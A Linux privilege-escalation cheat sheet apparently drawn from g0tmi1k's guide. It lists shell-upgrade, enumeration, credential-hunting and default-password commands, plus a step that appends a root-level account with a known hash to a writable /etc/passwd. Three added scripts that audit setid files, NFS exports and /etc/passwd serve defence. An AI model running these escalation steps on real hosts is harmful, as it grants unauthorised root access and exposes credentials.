Privilege Escalation
Based on g0tmi1k's Guide to Linux Privilege Escalation, plus additional field notes.
Step 1: Upgrade Your Shell

Make your shell more stable and interactive:

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'

# Background the shell, then fix the terminal and bring it back
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200

Step 2: Enumeration – System Context
Capabilities & Tooling

which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socat

Compilation / System Info

cat /etc/*-release
cat /etc/issue

Arch & Kernel

file /bin/bash
uname -a

Step 3: User Context
Are we a real user?

sudo -l
ls -lsaht /etc/sudoers
groups <user>
env

Users & homes:
cd /home/ && ls -lsaht

Step 4: Credentials & Configs
Check for web creds:
cd /var/www/html/ && ls -lsaht

Check /etc/ for unusual configs:
ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'

SSH keys:
ls -lsaR /home/

Other dirs of interest:
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/

Step 5: Escalation Primitives
SUID / SGID

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

Check exploitation paths: GTFOBins

File Capabilities

getcap -r / 2>/dev/null

Reference: Linux File Capabilities

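The SUID/SGID listing above is the same inventory a defender should be snapshotting, because a binary that gains the bit after the last snapshot is exactly what the two find commands are hunting for. The script below is an added example, not part of the original notes: it compares the current set of set-id files under a directory tree with a saved baseline and reports what appeared or disappeared. The baseline path, the demo directory and the file names in the demo are constructed for this example.

```shell
#!/bin/sh
# Added example: baseline comparison of setuid/setgid binaries.
# Not from the original notes; directory and baseline names are assumptions.

# Print every regular file under ROOT carrying the setuid or setgid bit,
# one path per line, sorted (stay on one filesystem, ignore unreadable dirs).
list_setid_files() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Files that carry a set-id bit now but are absent from BASELINE.
# Usage: new_setid_files BASELINE ROOT
new_setid_files() {
    sorted=$(mktemp)
    sort "$1" > "$sorted"
    list_setid_files "$2" | comm -13 "$sorted" -
    rm -f "$sorted"
}

# Baseline entries that no longer carry the bit (file removed or bit cleared).
# Usage: removed_setid_files BASELINE ROOT
removed_setid_files() {
    sorted=$(mktemp)
    sort "$1" > "$sorted"
    list_setid_files "$2" | comm -23 "$sorted" -
    rm -f "$sorted"
}

# Self-contained demo on a constructed tree; no real system binaries are touched.
demo() {
    tree=$(mktemp -d)
    mkdir -p "$tree/bin"
    : > "$tree/bin/passwd_clone"      # stands in for a legitimate set-id binary
    : > "$tree/bin/planted"           # stands in for one that gained the bit later
    chmod u+s "$tree/bin/passwd_clone" "$tree/bin/planted"
    printf '%s\n' "$tree/bin/passwd_clone" > "$tree/baseline"   # snapshot taken earlier

    echo "== set-id files not in the baseline =="
    new_setid_files "$tree/baseline" "$tree/bin"
    echo "== baseline entries that lost the bit =="
    removed_setid_files "$tree/baseline" "$tree/bin"
    rm -rf "$tree"
}

# Real use (assumed paths): list_setid_files / > /var/lib/setid.baseline once on a
# known-good host, then run new_setid_files /var/lib/setid.baseline / from cron and
# alert on any output.  Run with --demo to see the constructed example.
if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

The baseline is re-sorted before comparison so a hand-edited baseline still works; comm needs both inputs sorted or it silently reports wrong differences.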
Step 6: Process & Cron Monitoring
Running Processes

ps aux | grep -i root --color=auto

Network

netstat -antup
netstat -tunlp

Cron Jobs

crontab -u root -l
cat /etc/crontab
ls /etc/cron.*

Process Monitoring (pspy)

# On the target, after transferring pspy64 to a writable directory:
cd /var/tmp/
chmod 755 pspy64
./pspy64

Step 7: Databases
Check for MySQL root creds:
mysql -uroot -p
# Try common passwords:
# root, toor, (empty)

Step 8: File Transfers
Check what’s available:
which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'

Step 9: NFS
Check for exports:
cat /etc/exports

Look for no_root_squash → Attacking NFS Shares

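From the defending side the same file tells you which exports let a remote root keep uid 0 on the server. The script below is an added example, not part of the original notes or of any NFS tool: it parses an /etc/exports-format file, reports every export whose option list contains no_root_squash, and carries a constructed sample that shows the weak entry next to its corrected form (root_squash, which is also what exportfs applies when neither option is given). File names are assumptions.

```shell
#!/bin/sh
# Added example: audit an /etc/exports-format file for no_root_squash.
# Not from the original notes; sample content and paths are constructed.

# Print "PATH CLIENT" for every export entry whose options contain
# no_root_squash.  Exit status: 1 if anything was flagged, 0 otherwise,
# so it can drive a cron or CI check directly.
audit_exports() {
    awk '
        /^[[:space:]]*(#|$)/ { next }                  # comments and blank lines
        {
            path = $1
            for (i = 2; i <= NF; i++) {                # each client(options) field
                if ($i ~ /(^|[(,])no_root_squash([,)]|$)/) {
                    client = $i
                    sub(/\(.*$/, "", client)           # drop the "(options)" part
                    print path, client
                    flagged = 1
                }
            }
        }
        END { exit flagged ? 1 : 0 }
    ' "$1"
}

# Constructed sample: the first line is the weak configuration (the client
# keeps uid 0 on the server), the second is the corrected form of such an
# entry, the third squashes every user on a read-only public share.
write_sample_exports() {
    cat > "$1" <<'EOF'
# sample exports file (constructed for this example)
/srv/share   10.0.0.0/24(rw,sync,no_root_squash)
/srv/data    10.0.0.0/24(rw,sync,root_squash)
/srv/pub     *(ro,all_squash)
EOF
}

demo() {
    f=$(mktemp)
    write_sample_exports "$f"
    if audit_exports "$f"; then
        echo "no no_root_squash exports found"
    else
        echo "^ these exports keep remote root as root: change to root_squash and run exportfs -ra"
    fi
    rm -f "$f"
}

if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

The option match is anchored on the surrounding parentheses and commas so that root_squash and all_squash are not reported; a plain grep for root_squash would match all three sample lines.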
Step 10: Persistence / Living on Host
Writable locations:
- /var/tmp/
- /tmp/
- /dev/shm/
Check mounts:
cat /etc/fstab

Step 11: Local Port Forwards

If vulnerable services are only listening on 127.0.0.1:
- Use meterpreter port forwarding.

Step 12: Direct Root via /etc/passwd
If /etc/passwd is writable:

# quote the password, otherwise the shell treats '<' as an input redirection
openssl passwd -1 'i<3hacking'
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
id

Step 13: Miscellaneous
- Mail:
  cd /var/mail/
  cd /var/spool/mail/
  ls -lsaht
- Files owned by a specific user (e.g. bob):
  find / -user bob 2>/dev/null
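Returning to Step 12: the /etc/passwd edit is one of the easiest escalations to detect afterwards, because it leaves two artefacts in a file every monitoring agent already reads, an extra UID 0 entry and a password hash stored in passwd instead of shadow, and it requires the file to be writable in the first place. The script below is an added example, not part of the original notes: it audits a passwd-format file for those three signs and runs against a constructed copy that contains the siren line from Step 12. Paths are assumptions; on a real host point it at /etc/passwd.

```shell
#!/bin/sh
# Added example: detect the /etc/passwd modification described in Step 12.
# Not from the original notes; sample file content is constructed.

# Accounts with UID 0 that are not named root, printed as NAME:UID:SHELL.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 ":" $3 ":" $7 }' "$1"
}

# Accounts whose password field is neither the shadow marker ("x"), a lock
# marker ("*", "!", "!!") nor empty, i.e. a hash living in passwd itself.
local_hash_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" && $2 != "!!" && $2 != "" { print $1 }' "$1"
}

# Return 0 if FILE is neither group- nor world-writable, 1 otherwise.
passwd_perms_ok() {
    [ -z "$(find "$1" \( -perm -g=w -o -perm -o=w \) -print 2>/dev/null)" ]
}

# Run all three checks, print findings, return 1 if anything was found.
audit_passwd() {
    rc=0
    if ! passwd_perms_ok "$1"; then
        echo "FINDING: $1 is group- or world-writable"; rc=1
    fi
    for a in $(extra_uid0_accounts "$1"); do
        echo "FINDING: extra UID 0 account: $a"; rc=1
    done
    for a in $(local_hash_accounts "$1"); do
        echo "FINDING: password hash stored in passwd for: $a"; rc=1
    done
    return $rc
}

# Constructed sample: three ordinary entries plus the 'siren' line from Step 12,
# with the file left writable by everyone, the precondition that step relies on.
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash
alice:x:1000:1000:alice:/home/alice:/bin/bash
EOF
    chmod 666 "$1"
}

demo() {
    f=$(mktemp)
    write_sample_passwd "$f"
    audit_passwd "$f" || echo "(remediation: chmod 644, delete the added entry, keep hashes in /etc/shadow)"
    rm -f "$f"
}

if [ "${1:-}" = "--demo" ]; then
    demo
fi
```

The permission check reads the mode bits with find rather than testing `-w`, so it gives the same answer whether the audit runs as root or as an unprivileged user.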
